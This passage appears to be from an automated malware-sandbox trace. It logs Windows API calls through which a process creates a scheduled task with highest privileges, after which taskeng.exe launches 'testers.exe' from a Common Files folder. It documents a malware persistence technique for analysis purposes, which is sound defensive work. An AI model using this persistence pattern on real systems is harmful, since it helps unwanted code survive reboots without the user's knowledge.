(dwErrCode=0x490) [0074.481] IUnknown:Release (This=0x4d2678) returned 0x1 [0074.481] IUnknown:Release (This=0x4d3f10) returned 0x1 [0074.481] ITaskDefinition:get_Triggers (in: This=0x4d3e98, ppTriggers=0xbc9b0 | out: ppTriggers=0xbc9b0*=0x4d24f8) returned 0x0 [0074.481] ITriggerCollection:Create (in: This=0x4d24f8, Type=9, ppTrigger=0xbc9bc | out: ppTrigger=0xbc9bc*=0x4d26b8) returned 0x0 [0074.501] IUnknown:QueryInterface (in: This=0x4d26b8, riid=0x51528*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0xbc9a8 | out: ppvObject=0xbc9a8*=0x4d26b8) returned 0x0 [0074.501] IUnknown:Release (This=0x4d26b8) returned 0x2 [0074.501] _vsnwprintf (in: _Buffer=0xbc920, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0xbc908 | out: _Buffer="2020-07-24T23:24:00") returned 19 [0074.501] ITrigger:put_StartBoundary (This=0x4d26b8, StartBoundary="2020-07-24T23:24:00") returned 0x0 [0074.501] lstrlenW (lpString="") returned 0 [0074.501] lstrlenW (lpString="") returned 0 [0074.501] lstrlenW (lpString="") returned 0 [0074.501] lstrlenW (lpString="") returned 0 [0074.501] IUnknown:Release (This=0x4d26b8) returned 0x1 [0074.501] IUnknown:Release (This=0x4d24f8) returned 0x1 [0074.501] ITaskDefinition:get_Settings (in: This=0x4d3e98, ppSettings=0xbcdcc | out: ppSettings=0xbcdcc*=0x4d2538) returned 0x0 [0074.502] lstrlenW (lpString="") returned 0 [0074.502] IUnknown:Release (This=0x4d2538) returned 0x1 [0074.502] GetLocalTime (in: lpSystemTime=0xbccbc | out: lpSystemTime=0xbccbc*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x5, wDay=0x18, wHour=0x17, wMinute=0x18, wSecond=0x28, wMilliseconds=0x2a3)) [0074.502] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0074.502] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0074.502] GetUserNameW (in: lpBuffer=0xbccd0, pcbBuffer=0xbccb8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xbccb8) returned 1 [0074.502] ITaskDefinition:get_RegistrationInfo (in: This=0x4d3e98, ppRegistrationInfo=0xbcccc | out: ppRegistrationInfo=0xbcccc*=0x4d3f58) returned 0x0 [0074.503] IRegistrationInfo:put_Author (This=0x4d3f58, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0074.503] _vsnwprintf (in: _Buffer=0xbccd0, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xbcc90 | out: _Buffer="2020-07-24T23:24:40") returned 19 [0074.503] IRegistrationInfo:put_Date (This=0x4d3f58, Date="2020-07-24T23:24:40") returned 0x0 [0074.503] IUnknown:Release (This=0x4d3f58) returned 0x1 [0074.503] malloc (_Size=0xc) returned 0x4d2740 [0074.503] free (_Block=0x4d2740) [0074.503] lstrlenW (lpString="") returned 0 [0074.503] ITaskDefinition:get_Principal (in: This=0x4d3e98, ppPrincipal=0xbce70 | out: ppPrincipal=0xbce70*=0x4d2618) returned 0x0 [0074.503] IPrincipal:put_RunLevel (This=0x4d2618, RunLevel=1) returned 0x0 [0074.503] IUnknown:Release (This=0x4d2618) returned 0x1 [0074.503] malloc (_Size=0xc) returned 0x4d2740 [0074.503] ITaskFolder:RegisterTaskDefinition (in: This=0x4d3e58, Path="2620738370", pDefinition=0x4d3e98, flags=2, UserId=0xbcdb4*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0xbcdc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0xbcdd8*(varType=0x0, wReserved1=0x0, wReserved2=0xca60, wReserved3=0xb, varVal1=0x0, varVal2=0x0), ppTask=0xbce64 | out: ppTask=0xbce64*=0x4d2778) returned 0x0 [0074.955] free (_Block=0x4d2740) [0074.955] _memicmp (_Buf1=0x2d4d38, _Buf2=0x51ed8, _Size=0x7) returned 0 [0074.955] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x2d6798, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0074.955] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0074.955] GetProcessHeap () returned 0x2c0000 [0074.955] GetProcessHeap () returned 0x2c0000 [0074.955] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e10) returned 1 [0074.955] GetProcessHeap () returned 0x2c0000 [0074.955] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e10) returned 0xe [0074.955] _vsnwprintf (in: _Buffer=0xbd27c, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xbcde8 | out: _Buffer="SUCCESS: The scheduled task \"2620738370\" has successfully been created.\n") returned 72 [0074.955] _fileno (_File=0x77032920) returned 1 [0074.956] _errno () returned 0x4d07d8 [0074.956] _get_osfhandle (_FileHandle=1) returned 0x7 [0074.956] _errno () returned 0x4d07d8 [0074.956] GetFileType (hFile=0x7) returned 0x2 [0074.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0074.956] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xbcdac | out: lpMode=0xbcdac) returned 1 [0074.956] __iob_func () returned 0x77032900 [0074.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0074.957] lstrlenW (lpString="SUCCESS: The scheduled task \"2620738370\" has successfully been created.\n") returned 72 [0074.957] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xbd27c*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0xbcdd4, lpReserved=0x0 | out: lpBuffer=0xbd27c*, lpNumberOfCharsWritten=0xbcdd4*=0x48) returned 1 [0074.958] IUnknown:Release (This=0x4d2778) returned 0x0 [0074.958] TaskScheduler:IUnknown:Release (This=0x4d3e98) returned 0x0 [0074.959] TaskScheduler:IUnknown:Release (This=0x4d3e58) returned 0x0 [0074.959] TaskScheduler:IUnknown:Release (This=0x4d3df0) returned 0x1 [0074.959] lstrlenW (lpString="") returned 0 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6ab8) returned 1 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d6ab8) returned 0x1fc [0074.959] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54b8) returned 1 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d54b8) returned 0x16 [0074.959] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4c48) returned 1 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4c48) returned 0x10 [0074.959] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54d8) returned 1 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d54d8) returned 0x14 [0074.959] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d66f0) returned 1 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d66f0) returned 0xa0 [0074.959] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d20) returned 1 [0074.959] GetProcessHeap () returned 0x2c0000 [0074.959] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d20) returned 0x10 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5318) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5318) returned 0x14 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6a68) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d6a68) returned 0x42 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d98) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d98) returned 0x10 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d52f8) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d52f8) returned 0x14 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6a18) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d6a18) returned 0x46 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4de0) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4de0) returned 0x10 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d52d8) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d52d8) returned 0x14 [0074.960] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4dc8) returned 1 [0074.960] GetProcessHeap () returned 0x2c0000 [0074.960] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4dc8) returned 0xc [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4db0) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4db0) returned 0x10 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d52b8) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d52b8) returned 0x14 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5b00) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5b00) returned 0x208 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4cc0) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4cc0) returned 0x10 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5278) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5278) returned 0x14 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6798) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d6798) returned 0x200 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d38) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d38) returned 0x10 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5218) returned 1 [0074.961] GetProcessHeap () returned 0x2c0000 [0074.961] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5218) returned 0x14 [0074.961] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5398) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5398) returned 0x14 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d80) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d80) returned 0x10 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5198) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5198) returned 0x14 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53d8) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d53d8) returned 0x16 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4d50) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4d50) returned 0x10 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5160) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5160) returned 0x14 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5030) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5030) returned 0x2 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5040) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5040) returned 0x14 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5060) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5060) returned 0x14 [0074.962] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5080) returned 1 [0074.962] GetProcessHeap () returned 0x2c0000 [0074.962] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5080) returned 0x14 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d50a0) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d50a0) returned 0x14 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5338) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5338) returned 0x14 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e88) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e88) returned 0xc [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5358) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5358) returned 0x14 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69a0) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d69a0) returned 0x30 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5378) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5378) returned 0x14 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d69d8) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d69d8) returned 0x30 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5498) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5498) returned 0x14 [0074.963] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5518) returned 1 [0074.963] GetProcessHeap () returned 0x2c0000 [0074.963] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5518) returned 0x16 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5478) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5478) returned 0x14 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5538) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5538) returned 0x16 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5458) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5458) returned 0x14 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e49b0) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e49b0) returned 0x82 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5438) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5438) returned 0x14 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e28) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e28) returned 0xe [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5418) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5418) returned 0x14 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e40) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e40) returned 0xc [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53f8) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.964] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d53f8) returned 0x14 [0074.964] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e58) returned 1 [0074.964] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e58) returned 0xe [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d53b8) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d53b8) returned 0x14 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4e70) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4e70) returned 0x10 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d54f8) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d54f8) returned 0x14 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4c78) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4c78) returned 0x10 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d50c0) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d50c0) returned 0x14 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d50e0) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d50e0) returned 0x14 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5100) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5100) returned 0x14 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5120) returned 1 [0074.965] GetProcessHeap () returned 0x2c0000 [0074.965] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5120) returned 0x14 [0074.965] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4c90) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4c90) returned 0x10 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5140) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5140) returned 0x14 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d51b8) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d51b8) returned 0x14 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d51f8) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d51f8) returned 0x14 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5238) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5238) returned 0x14 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d5258) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d5258) returned 0x14 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4ca8) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4ca8) returned 0x10 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d51d8) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d51d8) returned 0x14 [0074.966] HeapValidate (hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d4c60) returned 1 [0074.966] GetProcessHeap () returned 0x2c0000 [0074.966] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d4c60) returned 0x10 [0074.967] exit (_Code=0) Thread: id = 16 os_tid = 0x87c Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "6" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0x310 Thread: id = 18 os_tid = 0x5b4 Thread: id = 19 os_tid = 0x5b0 Thread: id = 20 os_tid = 0x59c Thread: id = 21 os_tid = 0x594 Thread: id = 22 os_tid = 0x58c Process: id = "8" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x758ee000" os_pid = "0x628" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "6" os_parent_pid = "0x374" cmd_line = "taskeng.exe {73F940EE-8EED-4218-96B2-39EE3B93F6D4} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x62c Thread: id = 24 os_tid = 0x63c Thread: id = 25 os_tid = 0x64c Thread: id = 26 os_tid = 0x670 Thread: id = 27 os_tid = 0x674 Thread: id = 28 os_tid = 0x678 Thread: id = 29 os_tid = 0x6b8 Thread: id = 246 os_tid = 0x4e8 Process: id = "9" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x74bf6000" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x628" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 87 os_tid = 0x6e0 [0150.373] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x89fe58 | out: lpSystemTimeAsFileTime=0x89fe58*(dwLowDateTime=0x6b39e0, dwHighDateTime=0x1d661be)) [0150.373] GetCurrentThreadId () returned 0x6e0 [0150.373] GetCurrentProcessId () returned 0x6dc [0150.374] QueryPerformanceCounter (in: lpPerformanceCount=0x89fe50 | out: lpPerformanceCount=0x89fe50*=8092778361) returned 1 [0150.432] GetStartupInfoW (in: lpStartupInfo=0x89fde8 | out: lpStartupInfo=0x89fde8*(cb=0x44, lpReserved="", 